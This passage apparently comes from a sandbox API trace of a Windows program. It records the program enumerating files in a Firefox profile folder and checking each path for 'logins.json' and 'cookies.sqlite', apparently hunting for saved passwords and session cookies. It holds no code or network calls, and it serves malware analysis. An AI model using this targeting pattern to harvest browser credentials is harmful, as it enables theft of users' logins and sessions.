HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.159] lstrlenW (lpString="places.sqlite") returned 13 [0161.159] GetProcessHeap () returned 0x8e0000 [0161.159] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.159] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="places.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" [0161.159] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.159] GetProcessHeap () returned 0x8e0000 [0161.159] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.159] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="logins.json") returned 0x0 [0161.159] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.159] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.159] GetProcessHeap () returned 0x8e0000 [0161.159] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.159] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81fbde30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x81fbde30, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x81fbde30, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0161.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.159] lstrlenW (lpString="\\") returned 1 [0161.159] GetProcessHeap () returned 0x8e0000 [0161.159] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.159] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.159] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.159] lstrlenW (lpString="pluginreg.dat") returned 13 [0161.159] GetProcessHeap () returned 0x8e0000 [0161.159] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.159] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.159] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="pluginreg.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" [0161.159] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.160] GetProcessHeap () returned 0x8e0000 [0161.160] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.160] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="logins.json") returned 0x0 [0161.160] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat", lpSrch="cookies.sqlite") returned 0x0 [0161.160] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.160] GetProcessHeap () returned 0x8e0000 [0161.160] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.160] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x84c85c10, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x853f60d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x12069be0, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0xfde, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="prefs.js", cAlternateFileName="")) returned 1 [0161.160] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.160] lstrlenW (lpString="\\") returned 1 [0161.160] GetProcessHeap () returned 0x8e0000 [0161.160] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.160] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.160] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.160] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.160] lstrlenW (lpString="prefs.js") returned 8 [0161.160] GetProcessHeap () returned 0x8e0000 [0161.160] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x924a48 [0161.160] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.160] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="prefs.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" [0161.160] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.160] GetProcessHeap () returned 0x8e0000 [0161.160] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.160] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="logins.json") returned 0x0 [0161.160] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js", lpSrch="cookies.sqlite") returned 0x0 [0161.160] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.160] GetProcessHeap () returned 0x8e0000 [0161.160] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.160] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb6fa8c70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb6fa8c70, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb6fa8c70, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4183, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="search.json", cAlternateFileName="SEARCH~1.JSO")) returned 1 [0161.160] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.160] lstrlenW (lpString="\\") returned 1 [0161.160] GetProcessHeap () returned 0x8e0000 [0161.160] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.160] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.161] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.161] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.161] lstrlenW (lpString="search.json") returned 11 [0161.161] GetProcessHeap () returned 0x8e0000 [0161.161] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x924a48 [0161.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.161] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="search.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" [0161.161] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.161] GetProcessHeap () returned 0x8e0000 [0161.161] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.161] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="logins.json") returned 0x0 [0161.161] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json", lpSrch="cookies.sqlite") returned 0x0 [0161.161] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.161] GetProcessHeap () returned 0x8e0000 [0161.161] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.161] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb477d930, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb477d930, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb47c9bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="secmod.db", cAlternateFileName="")) returned 1 [0161.161] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.161] lstrlenW (lpString="\\") returned 1 [0161.161] GetProcessHeap () returned 0x8e0000 [0161.161] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.161] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.161] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.161] lstrlenW (lpString="secmod.db") returned 9 [0161.161] GetProcessHeap () returned 0x8e0000 [0161.161] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924a48 [0161.161] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.161] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="secmod.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" [0161.161] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.161] GetProcessHeap () returned 0x8e0000 [0161.161] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.161] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="logins.json") returned 0x0 [0161.161] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db", lpSrch="cookies.sqlite") returned 0x0 [0161.161] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.162] GetProcessHeap () returned 0x8e0000 [0161.162] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.162] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xc3787480, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xc3787480, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x3d6, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="sessionstore.bak", cAlternateFileName="SESSIO~1.BAK")) returned 1 [0161.162] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.162] lstrlenW (lpString="\\") returned 1 [0161.162] GetProcessHeap () returned 0x8e0000 [0161.162] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.162] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.162] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.162] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.162] lstrlenW (lpString="sessionstore.bak") returned 16 [0161.162] GetProcessHeap () returned 0x8e0000 [0161.162] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x924a48 [0161.162] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.162] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.bak" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" [0161.162] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.162] GetProcessHeap () returned 0x8e0000 [0161.162] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.162] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="logins.json") returned 0x0 [0161.162] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak", lpSrch="cookies.sqlite") returned 0x0 [0161.162] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.162] GetProcessHeap () returned 0x8e0000 [0161.162] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.162] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb82fff30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x84e029d0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x84e029d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xbc5, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="sessionstore.js", cAlternateFileName="SESSIO~1.JS")) returned 1 [0161.162] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.162] lstrlenW (lpString="\\") returned 1 [0161.162] GetProcessHeap () returned 0x8e0000 [0161.162] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.162] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.162] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.162] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.162] lstrlenW (lpString="sessionstore.js") returned 15 [0161.162] GetProcessHeap () returned 0x8e0000 [0161.162] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd0) returned 0x8fce90 [0161.162] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.163] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="sessionstore.js" | out: lpString1="C:\\Users\\5p5NrGJn0jS 